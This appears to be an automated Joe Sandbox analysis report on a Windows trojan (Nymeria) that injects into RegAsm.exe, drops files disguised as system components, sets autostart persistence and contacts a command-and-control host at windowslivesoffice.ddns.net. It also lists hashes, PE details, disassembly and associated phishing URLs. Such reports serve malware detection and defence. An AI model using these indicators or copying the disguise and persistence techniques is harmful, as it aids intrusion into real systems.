        • d4e475d7d17a16be8b9eeac6e10b25af.exe: dropped DiagnosticsHub.Sta...tor.Service.exe.bat (PE32); signatures: Contains functionality to inject code into remote processes, Writes to foreign memory regions, Allocates memory in foreign processes; started RegAsm.exe
        • DiagnosticsHub.StandardCollector.Service.exe.bat: signatures: Antivirus detection for dropped file, Binary is likely a compiled AutoIt script file, Injects a PE file into a foreign process; started RegAsm.exe
        • dhcpmon.exe: started conhost.exe
        • RegAsm.exe (started by d4e475d7d17a16be8b9eeac6e10b25af.exe): contacted windowslivesoffice.ddns.net 192.190.19.55, port 20377, COGENT-174US, Canada, and 127.0.0.1 (unknown); dropped C:\Users\user\AppData\Roaming\...\run.dat (data) and C:\Program Files (x86)\...\dhcpmon.exe (PE32); signature: Hides that the sample has been downloaded from the Internet (zone.identifier)


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        d4e475d7d17a16be8b9eeac6e10b25af.exe | 67% | Virustotal |
        d4e475d7d17a16be8b9eeac6e10b25af.exe | 41% | Metadefender |
        d4e475d7d17a16be8b9eeac6e10b25af.exe | 71% | ReversingLabs | Win32.Trojan.Nymeria
        d4e475d7d17a16be8b9eeac6e10b25af.exe | 100% | Avira | HEUR/AGEN.1100084

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | 100% | Avira | HEUR/AGEN.1100084
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Metadefender |
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        0.0.d4e475d7d17a16be8b9eeac6e10b25af.exe.8f0000.0.unpack | 100% | Avira | HEUR/AGEN.1100084
        2.0.DiagnosticsHub.StandardCollector.Service.exe.bat.3c0000.0.unpack | 100% | Avira | HEUR/AGEN.1100084
        3.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        2.2.DiagnosticsHub.StandardCollector.Service.exe.bat.3c0000.0.unpack | 100% | Avira | HEUR/AGEN.1100084

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        windowslivesoffice.ddns.net | 192.190.19.55 | true | true | | unknown

          Contacted IPs


          Public

IP             Domain   Country  ASN  ASN Name      Malicious
192.190.19.55  unknown  Canada   174  COGENT-174US  true

          Private

          IP
          127.0.0.1

          General Information

          Joe Sandbox Version:31.0.0 Red Diamond
          Analysis ID:320928
          Start date:20.11.2020
          Start time:07:23:08
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 43s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:d4e475d7d17a16be8b9eeac6e10b25af (renamed file extension from none to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:29
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/7@8/2
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 51.104.139.180, 92.122.144.200, 20.54.26.129, 95.101.22.134, 95.101.22.125
          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

Time      Type             Description
07:23:59  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk
07:24:01  API Interceptor  1025x Sleep call for process: RegAsm.exe modified
07:24:12  Autostart        Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

          Joe Sandbox View / Context

          IPs

          No context

          Domains

Match: windowslivesoffice.ddns.net

Associated Sample Name / URL          Detection  Context
e5bd3238d220c97cd4d6969abb3b33e0.exe  malicious  87.65.28.27
1c2dec9cbfcd95afe13bf71910fdf95f.exe  malicious  87.65.28.27
Xf6v0G2wIM.exe                        malicious  87.65.28.27
jztWD1iKrC.exe                        malicious  87.65.28.27
wH22vdkhhU.exe                        malicious  87.65.28.27
AqpOn6nwXS.exe                        malicious  87.65.28.27
CklrD7MYX2.exe                        malicious  87.65.28.27
FahZG6Pdc4.exe                        malicious  87.65.28.27
61WlCsQR9Q.exe                        malicious  87.65.28.27
U7DiqWP9qu.exe                        malicious  87.65.28.27
d4x5rI09A7.exe                        malicious  87.65.28.27
1WW425NrsA.exe                        malicious  87.65.28.27
Kyd6mztyQ5.exe                        malicious  87.65.28.27
xdNg7FUNS2.exe                        malicious  87.65.28.27
14muK1SuRQ.exe                        malicious  87.65.28.27
9fPECeVI6R.exe                        malicious  87.65.28.27
EkOjz981VJ.exe                        malicious  87.65.28.27
2WSPzeEKDI.exe                        malicious  87.65.28.27
wDbrNH1KqV.exe                        malicious  87.65.28.27
btxqAmncf4.exe                        malicious  87.65.28.27

          ASN

Match: COGENT-174US

Associated Sample Name / URL  |  Detection  |  Context
https://rebrand.ly/we9zn  |  malicious  |  154.59.122.79
http://tinyurl.com  |  malicious  |  154.59.122.74
https://gooten.staging.vigetx.com/login.html  |  malicious  |  38.97.80.199
https://www.kirche-die-weiter-geht.de/?email=bouaoudm@qcb.gov.qa  |  malicious  |  38.97.80.199
procmon.exe  |  malicious  |  38.108.185.64
https://firebasestorage.googleapis.com/v0/b/vvvvvvv-vvvvvvvv-vvvvvv.appspot.com/o/6j-5h5rtb-h4-5egr-5g5er%2F53-grf-3-4fw-e43-f4-f.html?alt=media&token=99d307bc-f2b9-4d29-9a6d-bfd8036d7f1e#john.doe@milking.com  |  malicious  |  38.97.80.199
INQUIRY-11062020_PDF .exe  |  malicious  |  38.108.185.79
ElectionInterference_626909835.xls  |  malicious  |  74.221.216.140
ElectionInterference_626909835.xls  |  malicious  |  74.221.216.140
http://facility-trust.com/editdirect/images/login.html#is_department@qcb.gov.qa  |  malicious  |  38.97.80.199
http://facility-trust.com/editdirect/images/login.html#bouaoudm@qcb.gov.qa  |  malicious  |  38.97.80.199
http://egawakikou.com/editdirect/images/login.html#cybersecuritysection@qcb.gov.qa  |  malicious  |  38.97.80.199
http://3ladies.su  |  malicious  |  154.47.36.75
http://mirror.ette.biz  |  malicious  |  38.105.93.109
AWESHBBET4UoPiY9.doc  |  malicious  |  185.142.236.163
TRANSACTION A CONFIRMER .PDF.jar  |  malicious  |  154.44.177.60
TRANSACTION A CONFIRMER .PDF.jar  |  malicious  |  154.44.177.60
https://tinyurl.com/y4w2x5ys.  |  malicious  |  154.59.122.79
atqwZDvY.exe  |  malicious  |  23.237.25.182
http://www.onionringsandthings.com  |  malicious  |  154.59.122.79

          JA3 Fingerprints

          No context

          Dropped Files

Match: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Associated Sample Name / URL          Detection
e5bd3238d220c97cd4d6969abb3b33e0.exe  malicious
1c2dec9cbfcd95afe13bf71910fdf95f.exe  malicious
Xf6v0G2wIM.exe                        malicious
jztWD1iKrC.exe                        malicious
wH22vdkhhU.exe                        malicious
AqpOn6nwXS.exe                        malicious
CklrD7MYX2.exe                        malicious
FahZG6Pdc4.exe                        malicious
61WlCsQR9Q.exe                        malicious
U7DiqWP9qu.exe                        malicious
d4x5rI09A7.exe                        malicious
1WW425NrsA.exe                        malicious
Kyd6mztyQ5.exe                        malicious
xdNg7FUNS2.exe                        malicious
14muK1SuRQ.exe                        malicious
9fPECeVI6R.exe                        malicious
EkOjz981VJ.exe                        malicious
2WSPzeEKDI.exe                        malicious
wDbrNH1KqV.exe                        malicious
btxqAmncf4.exe                        malicious

                                                  Created / dropped Files

                                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):53248
                                                  Entropy (8bit):4.490095782293901
                                                  Encrypted:false
                                                  SSDEEP:768:0P2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2wTFRJS8Ulg:HJv46yoD2BTNz1+M9GLfOw8UO
                                                  MD5:529695608EAFBED00ACA9E61EF333A7C
                                                  SHA1:68CA8B6D8E74FA4F4EE603EB862E36F2A73BC1E5
                                                  SHA-256:44F129DE312409D8A2DF55F655695E1D48D0DB6F20C5C7803EB0032D8E6B53D0
                                                  SHA-512:8FE476E0185B2B0C66F34E51899B932CB35600C753D36FE102BDA5894CDAA58410044E0A30FDBEF76A285C2C75018D7C5A9BA0763D45EC605C2BBD1EBB9ED674
                                                  Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: e5bd3238d220c97cd4d6969abb3b33e0.exe, Detection: malicious
• Filename: 1c2dec9cbfcd95afe13bf71910fdf95f.exe, Detection: malicious
• Filename: Xf6v0G2wIM.exe, Detection: malicious
• Filename: jztWD1iKrC.exe, Detection: malicious
• Filename: wH22vdkhhU.exe, Detection: malicious
• Filename: AqpOn6nwXS.exe, Detection: malicious
• Filename: CklrD7MYX2.exe, Detection: malicious
• Filename: FahZG6Pdc4.exe, Detection: malicious
• Filename: 61WlCsQR9Q.exe, Detection: malicious
• Filename: U7DiqWP9qu.exe, Detection: malicious
• Filename: d4x5rI09A7.exe, Detection: malicious
• Filename: 1WW425NrsA.exe, Detection: malicious
• Filename: Kyd6mztyQ5.exe, Detection: malicious
• Filename: xdNg7FUNS2.exe, Detection: malicious
• Filename: 14muK1SuRQ.exe, Detection: malicious
• Filename: 9fPECeVI6R.exe, Detection: malicious
• Filename: EkOjz981VJ.exe, Detection: malicious
• Filename: 2WSPzeEKDI.exe, Detection: malicious
• Filename: wDbrNH1KqV.exe, Detection: malicious
• Filename: btxqAmncf4.exe, Detection: malicious
                                                  Reputation:moderate, very likely benign file
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z..................... .......... ........@.. ..............................N.....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):525
                                                  Entropy (8bit):5.2874233355119316
                                                  Encrypted:false
                                                  SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                  MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                  SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                  SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                  SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):20
                                                  Entropy (8bit):3.6841837197791887
                                                  Encrypted:false
                                                  SSDEEP:3:QHXMKas:Q3Las
                                                  MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                                  SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                                  SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                                  SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..
                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):3.0
                                                  Encrypted:false
                                                  SSDEEP:3:Fo:C
                                                  MD5:C8C55F14E620A40AF72BA9FB954B53B7
                                                  SHA1:26204CA80EDC41FE334D14B13D7D362ED1BDB63A
                                                  SHA-256:B31C3E533C19283D0E1C6293836D503DCB4D849FA80406E8BA9B2F93069EA3D3
                                                  SHA-512:1C82B305A1E20711004A386DFD610C3335DD7EC7F14459F95935A36B6AD37FB45085EFD251B82F298823816E72AFC95416BC4B44FFBA2D5E151B02CB0F511EB6
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview: ...Oh..H
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk
                                                  Process:C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 20 14:23:58 2020, mtime=Fri Nov 20 14:23:58 2020, atime=Fri Nov 20 14:23:58 2020, length=1124928, window=hide
                                                  Category:dropped
                                                  Size (bytes):1049
                                                  Entropy (8bit):4.993550060752574
                                                  Encrypted:false
                                                  SSDEEP:12:8b1y4gqqWOCenvRPIqsFwcAjApvUhy52t6RPIqsFw2wuLMb65bW4t2Y+xIBjKZm:8JgqdOXvNcUApOE2t6N2Vc7aB6m
                                                  MD5:9605AC37B3F6DE1696D5748CEF890D4F
                                                  SHA1:6EA4664E24A6B40707294E0C2C94FF0D3D29E873
                                                  SHA-256:2E6D3FF6EE73345692DEE4CA6BDCC2654876AB71A228E3C1E7B3108C08E2D22F
                                                  SHA-512:E2D0D9C0256753B62E9A20897559299DACEFBBF1BFDE6D526836A73B121D74F31BAA66937C64BC50D4E9A7F0874DAB387BECA861E2664D81245ACFD389CC04A9
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: L..................F.... ...D..*Q....@.*Q....@.*Q...@*......................j.:..DG..Yr?.D..U..k0.&...&...........-..D..*Q.....*Q.......t...CFSF..1.....tQ.{..hdwwiz....t.Y^...H.g.3..(.....gVA.G..k...>......tQ.{tQ.{.....d...................... .h.d.w.w.i.z...B...2.@*..tQ.{ .DIAGNO~1.BAT.........tQ.{tQ.{.....e.....................g..D.i.a.g.n.o.s.t.i.c.s.H.u.b...S.t.a.n.d.a.r.d.C.o.l.l.e.c.t.o.r...S.e.r.v.i.c.e...e.x.e...b.a.t.......u...............-.......t...........i........C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat..L.....\.....\.....\.....\.....\.....\.....\.h.d.w.w.i.z.\.D.i.a.g.n.o.s.t.i.c.s.H.u.b...S.t.a.n.d.a.r.d.C.o.l.l.e.c.t.o.r...S.e.r.v.i.c.e...e.x.e...b.a.t.........|....I.J.H..K..:...`.......X.......562258...........!a..%.H.VZAj...R..-.........-..!a..%.H.VZAj...R..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH
                                                  C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
                                                  Process:C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1124928
                                                  Entropy (8bit):7.084344199511202
                                                  Encrypted:false
                                                  SSDEEP:24576:16bH5wWsN1Qy5WlLVVCj3jtmHanc5vuZoX2lPA5L:05BysTV23RYanc5vmo2uL
                                                  MD5:F660ED54597E4FF5354B557329CAB70D
                                                  SHA1:6222B1BD8920FA8FAD0507278E563E1736EBC257
                                                  SHA-256:B242D6C625537AC1CF52752A1997C035063C8E4B5648C41D443A2926F7C599E5
                                                  SHA-512:A26BEB3E4F4B52A441D53BB901B6886897CE388608B5DF9F98709F76719C5F02724DFB61C784F792629975EACA8BCB51319203C17BCED969669D53794A0CD68A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:low
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L......\.........."..........@....................@.................................p.....@...@.......@.........................|........|......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....|.......~...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                  \Device\ConDrv
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1010
                                                  Entropy (8bit):4.298581893109255
                                                  Encrypted:false
                                                  SSDEEP:24:zKTDwL/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zKTDwAXZxo4ABV+SrUYE
                                                  MD5:367EEEC425FE7E80B723298C447E2F22
                                                  SHA1:3873DFC88AF504FF79231FE2BF0E3CD93CE45195
                                                  SHA-256:481A7A3CA0DD32DA4772718BA4C1EF3F01E8D184FE82CF6E9C5386FD343264BC
                                                  SHA-512:F7101541D87F045E9DBC45941CDC5A7F97F3EFC29AC0AF2710FC24FA64F0163F9463DE373A5D2BE1270126829DE81006FB8E764186374966E8D0E9BB35B7D7D6
                                                  Malicious:false
                                                  Preview: Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.8922..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information.. /? or /help Display this usage

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.084338376698759
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:d4e475d7d17a16be8b9eeac6e10b25af.exe
                                                  File size:1124920
                                                  MD5:5162337b6fd4c8806ef62f6ebf4a5df8
                                                  SHA1:126642db1117de853d7e0ae601e0ff45358d7413
                                                  SHA256:9c2e4a4a0e7bb4c3c47ca33ec0d0c377fa38e0ae498721062432648ebf060a10
                                                  SHA512:cebb47171a6a97dc9cdd52ad14561e032732a6c405a3e8f103508255ac45e8f210a2bc5c82ea2320d279809a519cf4182cad7d5a58899f84669ef0244de5c81f
                                                  SSDEEP:24576:16bH5wWsN1Qy5WlLVVCj3jtmHanc5vuZoX2lPA5w:05BysTV23RYanc5vmo2uw
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                  File Icon

                                                  Icon Hash:aab2e3e39383aa00

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x42800a
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                  Time Stamp:0x5CF3C8E6 [Sun Jun 2 13:02:30 2019 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F2A60799B7Dh
                                                  jmp 00007F2A6078C934h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  push ecx
                                                  pop eax
                                                  push ecx
                                                  pop edx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F2A6078CABAh
                                                  cmp edi, eax
                                                  jc 00007F2A6078CE1Eh
                                                  bt dword ptr [004C41FCh], 01h
                                                  jnc 00007F2A6078CAB9h
                                                  rep movsb
                                                  jmp 00007F2A6078CDCCh
                                                  cmp ecx, 00000080h
                                                  jc 00007F2A6078CC84h
                                                  push edi
                                                  pop eax
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007F2A6078CAC0h
                                                  bt dword ptr [004BF324h], 01h
                                                  jc 00007F2A6078CF90h
                                                  bt dword ptr [004C41FCh], 00000000h
                                                  jnc 00007F2A6078CC5Dh
                                                  test edi, 00000003h
                                                  jne 00007F2A6078CC6Eh
                                                  test esi, 00000003h
                                                  jne 00007F2A6078CC4Dh
                                                  bt edi, 02h
                                                  jnc 00007F2A6078CABFh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007F2A6078CAC3h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007F2A6078CB15h
                                                  bt esi, 03h

Rich Headers

Programming Language:
• [ C ] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [LNK] VS2013 UPD5 build 40629
• [ASM] VS2013 UPD5 build 40629
• [C++] VS2013 build 21005
• [ASM] VS2013 build 21005
• [RES] VS2013 build 21005
• [IMP] VS2008 SP1 build 30729

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x47cbc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x110000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | False | 0.582306338028 | data | 6.72346657583 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | False | 0.328288185379 | data | 5.76324400576 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | False | 0.10175304878 | data | 1.19638192355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xc8000 | 0x47cbc | 0x47e00 | False | 0.908023097826 | data | 7.84935069972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x110000 | 0x7134 | 0x7200 | False | 0.761753015351 | data | 6.78395555713 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xc85e8 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc8710 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc8838 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc8960 | 0x2e8 | data | English | Great Britain
RT_ICON | 0xc8c48 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xc8d70 | 0xea8 | data | English | Great Britain
RT_ICON | 0xc9c18 | 0x8a8 | dBase III DBT, version number 0, next free block index 40 | English | Great Britain
RT_ICON | 0xca4c0 | 0x568 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_ICON | 0xcaa28 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | English | Great Britain
RT_ICON | 0xccfd0 | 0x10a8 | data | English | Great Britain
RT_ICON | 0xce078 | 0x468 | GLS_BINARY_LSB_FIRST | English | Great Britain
RT_MENU | 0xce4e0 | 0x50 | data | English | Great Britain
RT_STRING | 0xce530 | 0x594 | data | English | Great Britain
RT_STRING | 0xceac4 | 0x68a | data | English | Great Britain
RT_STRING | 0xcf150 | 0x490 | data | English | Great Britain
RT_STRING | 0xcf5e0 | 0x5fc | data | English | Great Britain
RT_STRING | 0xcfbdc | 0x65c | data | English | Great Britain
RT_STRING | 0xd0238 | 0x466 | data | English | Great Britain
RT_STRING | 0xd06a0 | 0x158 | data | English | Great Britain
RT_RCDATA | 0xd07f8 | 0x2bef0 | data | |
RT_RCDATA | 0xfc6e8 | 0x13052 | data | |
RT_GROUP_ICON | 0x10f73c | 0x76 | data | English | Great Britain
RT_GROUP_ICON | 0x10f7b4 | 0x14 | data | English | Great Britain
RT_GROUP_ICON | 0x10f7c8 | 0x14 | data | English | Great Britain
